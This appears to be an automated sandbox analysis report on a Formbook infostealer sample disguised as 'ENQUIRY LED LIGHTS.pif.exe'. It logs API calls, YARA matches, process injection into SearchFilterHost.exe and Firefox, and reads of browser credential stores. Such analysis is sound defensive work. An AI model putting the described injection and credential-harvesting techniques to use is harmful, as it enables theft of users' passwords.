            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52E30 NtWriteVirtualMemory,3_2_02F52E30
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52FE0 NtCreateFile,3_2_02F52FE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52FB0 NtResumeThread,3_2_02F52FB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52FA0 NtQuerySection,3_2_02F52FA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52F90 NtProtectVirtualMemory,3_2_02F52F90
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52F60 NtCreateProcessEx,3_2_02F52F60
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52F30 NtCreateSection,3_2_02F52F30
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52CF0 NtOpenProcess,3_2_02F52CF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52CC0 NtQueryVirtualMemory,3_2_02F52CC0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52CA0 NtQueryInformationToken,3_2_02F52CA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52C60 NtCreateKey,3_2_02F52C60
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52C00 NtQueryInformationProcess,3_2_02F52C00
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52DD0 NtDelayExecution,3_2_02F52DD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52DB0 NtEnumerateKey,3_2_02F52DB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52D30 NtUnmapViewOfSection,3_2_02F52D30
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52D10 NtMapViewOfSection,3_2_02F52D10
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52D00 NtSetInformationFile,3_2_02F52D00
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F53090 NtSetValueKey,3_2_02F53090
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F53010 NtOpenDirectoryObject,3_2_02F53010
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F539B0 NtGetContextThread,3_2_02F539B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F53D70 NtOpenThread,3_2_02F53D70
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F53D10 NtOpenProcessToken,3_2_02F53D10
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B4650 NtSuspendThread,LdrInitializeThunk,8_2_051B4650
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B4340 NtSetContextThread,LdrInitializeThunk,8_2_051B4340
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_051B2D10
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_051B2D30
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2DD0 NtDelayExecution,LdrInitializeThunk,8_2_051B2DD0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_051B2DF0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_051B2C70
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2C60 NtCreateKey,LdrInitializeThunk,8_2_051B2C60
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_051B2CA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2F30 NtCreateSection,LdrInitializeThunk,8_2_051B2F30
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2FB0 NtResumeThread,LdrInitializeThunk,8_2_051B2FB0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2FE0 NtCreateFile,LdrInitializeThunk,8_2_051B2FE0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_051B2E80
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_051B2EE0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2B60 NtClose,LdrInitializeThunk,8_2_051B2B60
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_051B2BA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_051B2BF0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_051B2BE0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2AD0 NtReadFile,LdrInitializeThunk,8_2_051B2AD0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2AF0 NtWriteFile,LdrInitializeThunk,8_2_051B2AF0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B35C0 NtCreateMutant,LdrInitializeThunk,8_2_051B35C0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B39B0 NtGetContextThread,LdrInitializeThunk,8_2_051B39B0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2D00 NtSetInformationFile,8_2_051B2D00
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2DB0 NtEnumerateKey,8_2_051B2DB0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2C00 NtQueryInformationProcess,8_2_051B2C00
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2CC0 NtQueryVirtualMemory,8_2_051B2CC0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2CF0 NtOpenProcess,8_2_051B2CF0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2F60 NtCreateProcessEx,8_2_051B2F60
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2F90 NtProtectVirtualMemory,8_2_051B2F90
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2FA0 NtQuerySection,8_2_051B2FA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2E30 NtWriteVirtualMemory,8_2_051B2E30
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2EA0 NtAdjustPrivilegesToken,8_2_051B2EA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2B80 NtQueryInformationFile,8_2_051B2B80
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2AB0 NtWaitForSingleObject,8_2_051B2AB0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B3010 NtOpenDirectoryObject,8_2_051B3010
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B3090 NtSetValueKey,8_2_051B3090
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B3D10 NtOpenProcessToken,8_2_051B3D10
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B3D70 NtOpenThread,8_2_051B3D70
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032B8F20 NtCreateFile,8_2_032B8F20
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032B9370 NtAllocateVirtualMemory,8_2_032B9370
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032B9210 NtClose,8_2_032B9210
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032B9170 NtDeleteFile,8_2_032B9170
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032B9080 NtReadFile,8_2_032B9080
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523FB768_2_0523FB76
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0519FB808_2_0519FB80
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051BDBF98_2_051BDBF9
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051F5BF08_2_051F5BF0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05237A468_2_05237A46
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523FA498_2_0523FA49
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051F3A6C8_2_051F3A6C
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05221AA38_2_05221AA3
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0521DAAC8_2_0521DAAC
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051C5AA08_2_051C5AA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0522DAC68_2_0522DAC6
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032A1AD08_2_032A1AD0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0329CA808_2_0329CA80
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0329AD208_2_0329AD20
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0329CCA08_2_0329CCA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032A337B8_2_032A337B
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032A33808_2_032A3380
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032A51908_2_032A5190
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032BB8308_2_032BB830
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0549E4838_2_0549E483
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0549E3688_2_0549E368
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0549E8228_2_0549E822
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0549D8888_2_0549D888
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0549CB238_2_0549CB23
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: String function: 02F55130 appears 58 times
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: String function: 02F0B970 appears 262 times
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: String function: 02F8EA12 appears 86 times
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: String function: 02F67E54 appears 99 times
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: String function: 02F9F290 appears 103 times
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: String function: 051EEA12 appears 86 times
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: String function: 0516B970 appears 262 times
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: String function: 051FF290 appears 103 times
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: String function: 051C7E54 appears 107 times
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: String function: 051B5130 appears 58 times
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1742324403.0000000009B80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs ENQUIRY LED LIGHTS.pif.exe
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1731368174.000000000098E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ENQUIRY LED LIGHTS.pif.exe
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000000.1704551921.0000000000388000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYRoZ.exe" vs ENQUIRY LED LIGHTS.pif.exe
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000003.00000002.2069312956.000000000300D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ENQUIRY LED LIGHTS.pif.exe
            Source: ENQUIRY LED LIGHTS.pif.exeBinary or memory string: OriginalFilenameYRoZ.exe" vs ENQUIRY LED LIGHTS.pif.exe
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, zCdZB2IyVxidTBWpWC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, zCdZB2IyVxidTBWpWC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, zCdZB2IyVxidTBWpWC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@6/4
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ENQUIRY LED LIGHTS.pif.exe.logJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeFile created: C:\Users\user\AppData\Local\Temp\34R62IL6Jump to behavior
            Source: ENQUIRY LED LIGHTS.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SearchFilterHost.exe, 00000008.00000003.2402682068.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2975886564.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2401755636.0000000003497000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: ENQUIRY LED LIGHTS.pif.exeReversingLabs: Detection: 26%
            Source: unknownProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeProcess created: C:\Windows\SysWOW64\SearchFilterHost.exe "C:\Windows\SysWOW64\SearchFilterHost.exe"
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"Jump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeProcess created: C:\Windows\SysWOW64\SearchFilterHost.exe "C:\Windows\SysWOW64\SearchFilterHost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: tquery.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: secur32.dllJump to behavior
